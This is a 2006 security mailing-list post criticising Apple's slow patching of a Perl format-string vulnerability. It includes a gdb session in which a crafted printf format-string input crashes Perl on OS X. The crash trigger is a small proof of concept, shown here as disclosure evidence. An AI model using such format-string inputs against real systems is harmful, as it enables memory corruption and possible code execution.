|
Focus on Apple
Re: .dmg file exploit Nov 21 2006 09:08PM mfossi securityfocus com (2 replies) Re: .dmg file exploit Nov 21 2006 09:49PM Roland Dobbins (rdobbins cisco com) (2 replies) Re: .dmg file exploit Nov 22 2006 03:25PM mfossi securityfocus com (1 replies) Re: .dmg file exploit Nov 22 2006 04:04PM Roland Dobbins (rdobbins cisco com) (1 replies) Re: .dmg file exploit Nov 22 2006 06:02PM Martin Roesch (roesch sourcefire com) (3 replies) Re: .dmg file exploit Nov 22 2006 06:40PM Jeramey Valley (ValleyJR mps k12 mi us) (1 replies) Re: .dmg file exploit Nov 22 2006 06:37PM Roland Dobbins (rdobbins cisco com) (1 replies) Re: .dmg file exploit Nov 22 2006 08:29PM Martin Roesch (roesch sourcefire com) (2 replies) Re: .dmg file exploit Nov 22 2006 08:45PM Roland Dobbins (rdobbins cisco com) (1 replies) Re: .dmg file exploit Nov 23 2006 10:15AM Simon Slavin (s slavin lancaster ac uk) (1 replies) |
|
|
Privacy Statement |
>
>
> Does that disqualify Simon from expressing his opinion? However, if you
> really want to be convincing over its exploitability, demonstration is the
> only real evidence worth considering.
>
>
No it does not at all... however making comments (that may appear to be
fact to others) like:
"because of the interior workings of OS X there's no way to tell where
your arbitrary code would be put in memory, so there's no obvious way to
trigger its execution" are something he should probably refrain from....
> That makes Apple sound completely irresponsible in security matters, which
> is hardly accurate. I would be very surprised if they were not taking it
> seriously, although that does not guarantee that they will be able to fix it
> in time for the next update. Only time will tell.
>
Well I would not exactly say irresponsible, nor would I say timely or
necessarily trustworthy....
heres a simple example:
http://www.securityfocus.com/bid/15629
A good chunk of the vendors out there had this fixed within a month of
it being disclosed. Apple however... they will fix it when they see fit.
Mean while they continue to lay under the radar on the as far as being
vulnerable .
kevin-finisterres-computer:~ kf$ softwareupdate -l
Software Update Tool
Copyright 2002-2005 Apple
Software Update found the following new or updated software:
* MacminiFirmwareUpdate-1.1
Mac mini EFI Firmware Update (1.1), 1970K [recommended]
(just a firmware update)
kevin-finisterres-computer:~ kf$ gdb -q perl
Reading symbols for shared libraries .... done
(gdb) r -e 'printf("%2147483658\$n");'
Starting program: /usr/bin/perl -e 'printf("%2147483658\$n");'
Reading symbols for shared libraries . done
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000008
0x967ce510 in Perl_sv_setiv ()
hell in 6 days it will be a year old and they still have not patched it
up...
This issue was disclosed on Nov 29 2005 12:00AM
what else is laying around unpatched for a year on your mac?
irresponsible? lazy? you decide....
-KF
[ reply ]